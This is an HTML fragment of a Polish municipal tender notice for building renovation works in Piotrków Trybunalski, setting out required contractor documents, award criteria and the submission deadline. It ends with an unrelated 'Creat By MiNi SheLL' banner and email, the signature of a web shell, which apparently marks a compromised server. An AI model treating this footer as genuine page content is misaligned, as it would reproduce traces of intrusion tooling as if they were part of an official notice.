<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kompletna oferta musi zawierać:
1. Formularz ofertowy według wzoru zawartego w specyfikacji istotnych warunków zamówienia - wg załącznika nr 1; 
2. Oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust 1 oraz ust 2 ustawy Pzp - wg załącznika nr 2;
3. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - wg załącznika nr 3. Osoby te muszą posiadać uprawnienia do pełnienia samodzielnej funkcji technicznej w budownictwie o specjalności konstrukcyjno - budowlanej;
4. Wykaz co najmniej trzech zamówień o wartości całkowitej co najmniej 200 000,00 zł brutto każda (wykonanych w okresie pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) odpowiadających rodzajem przedmiotowi niniejszego zamówienia, tj. polegających na wykonaniu robót remontowych budynków, w tym przynajmniej dwóch dotyczących robót termomodernizacyjnych - wg załącznika nr  4;
5. Dokumenty potwierdzające, że roboty wyszczególnione w załączniku nr 4 zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;
6. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
7. Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu  - wg załącznika nr 5;
8. Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
9. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 8 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, stwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
c) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
11. Jeżeli w kraju zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 8 zastępuje się je dokumentem zawierającym oświadczenie w którym określi się także osoby uprawnione do reprezentacji wykonawcy złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Rękojmia - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa na realizację zamówienia zostanie zawarta na warunkach wymienionych w załączonym do SIWZ wzorze umowy par.17</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piotrkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Piotrkowa Trybunalskiego Pasaż Rudowskiego 10 97-300 Piotrków Trybunalski pok.317.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2016 godzina 09:00, miejsce: Urząd Miasta Piotrkowa Trybunalskiego Pasaż Rudowskiego 10 97-300 Piotrków Trybunalski Punkt Informacyjny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com